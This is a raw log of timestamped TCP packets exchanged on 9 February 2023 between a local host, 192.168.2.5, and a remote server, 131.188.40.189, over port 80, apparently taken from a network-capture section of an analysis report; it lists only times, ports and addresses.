                      Feb 9, 2023 01:01:54.825335026 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825356960 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825373888 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825383902 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825413942 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825424910 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825439930 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825467110 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825489998 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825498104 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825525999 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825536013 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825553894 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825579882 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825591087 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825608969 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825634956 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825647116 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825663090 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825692892 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825715065 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825721979 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825748920 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825768948 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825774908 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825803995 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825830936 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825833082 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825858116 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825877905 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825884104 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825908899 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825923920 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.825937986 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825969934 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.825972080 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847166061 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847229958 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847260952 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847290993 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847318888 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847345114 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847372055 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847378969 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847400904 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847434998 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847460032 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847465992 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847493887 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847500086 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847534895 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847548008 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847569942 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847632885 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847640038 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847670078 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847700119 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847709894 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847729921 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847759008 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847769976 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847790956 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847819090 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847830057 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847847939 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847875118 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847887039 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847912073 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847939968 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847964048 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.847965002 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.847990990 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848006964 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848018885 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848047018 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848062038 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848073959 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848100901 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848114967 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848129988 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848159075 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848169088 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848187923 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848217964 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848229885 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848248005 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848277092 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848288059 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848304987 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848330021 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848355055 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848355055 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848385096 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848408937 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848411083 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848438978 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848449945 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848472118 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848505020 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848514080 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848536968 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848567963 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848578930 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848601103 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848632097 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848642111 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.848664045 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848694086 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.848702908 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.870172977 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.870235920 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.870270967 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.870302916 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.870313883 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.870332956 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.870358944 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.870362043 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.870398045 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.870423079 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.870431900 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.870445013 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.905174971 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926418066 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926469088 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926491976 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926505089 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926542044 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926554918 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926569939 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926599979 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926625967 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926654100 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926667929 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926680088 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926687002 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926734924 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926760912 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926763058 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926790953 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926805973 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926825047 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926853895 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926872969 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926881075 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926909924 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926929951 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926937103 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926964998 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.926985025 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.926994085 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927021980 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927041054 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927048922 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927077055 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927098989 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927105904 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927133083 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927153111 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927160978 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927190065 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927211046 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927217960 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927246094 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927256107 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927275896 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927303076 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927319050 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927331924 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927360058 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927376032 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927387953 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927417040 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927427053 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927443981 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927470922 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927489996 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927500010 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927529097 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927550077 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927556038 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927583933 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927602053 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927612066 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927639008 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927649975 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927666903 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927692890 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927711964 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927717924 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927748919 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927764893 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927778959 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927807093 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927814007 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927834988 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927864075 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927886009 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927891016 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927920103 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927936077 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.927947998 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927973986 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.927994967 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928000927 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928028107 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928045034 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928056002 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928085089 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928102016 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928112030 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928139925 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928154945 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928167105 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928194046 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928201914 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928220987 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928248882 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928267002 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928275108 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928301096 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928322077 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928328991 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928356886 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928373098 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928385019 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928411961 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928421021 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928440094 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928464890 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928477049 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928492069 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928520918 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928531885 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928551912 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928582907 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928606033 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928611040 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928638935 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928648949 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928668022 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928695917 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928700924 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928725958 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928755045 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928756952 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928781986 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928807974 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928816080 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928838015 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928864956 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928877115 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928891897 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928919077 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928920984 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.928946018 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928973913 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.928987026 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.929003000 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929029942 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929034948 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.929059982 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929085970 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929096937 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.929116011 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929143906 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929155111 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.929171085 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929198980 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929204941 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.929228067 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929258108 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929270029 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.929286003 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929315090 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929322004 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.929342985 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.929387093 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.941976070 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.950572968 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950618029 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950650930 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950679064 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950719118 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.950726032 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950757027 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950768948 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.950786114 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950814962 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950817108 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.950844049 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950870037 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.950874090 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950902939 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950922012 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.950932026 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950958967 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.950978994 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.950987101 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951019049 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951028109 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951049089 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951077938 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951105118 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951107025 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951138020 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951155901 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951164961 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951195002 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951219082 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951225042 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951255083 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951278925 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951284885 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951313972 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951332092 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951344967 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951371908 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951392889 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951399088 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951428890 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951451063 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951457977 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951486111 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951503992 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951518059 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951545000 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951564074 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951572895 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951600075 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951616049 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951636076 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951659918 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951678038 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951689959 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951721907 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951740026 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951756954 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951782942 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951802015 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951812029 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951843023 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951852083 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951874971 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951910019 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951917887 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.951941013 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951973915 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.951984882 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.952006102 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.952040911 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.952050924 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.952071905 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.952105045 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.952112913 CET4973880192.168.2.5131.188.40.189
                      Feb 9, 2023 01:01:54.952133894 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.952164888 CET8049738131.188.40.189192.168.2.5
                      Feb 9, 2023 01:01:54.952172995 CET4973880192.168.2.5131.188.40.189
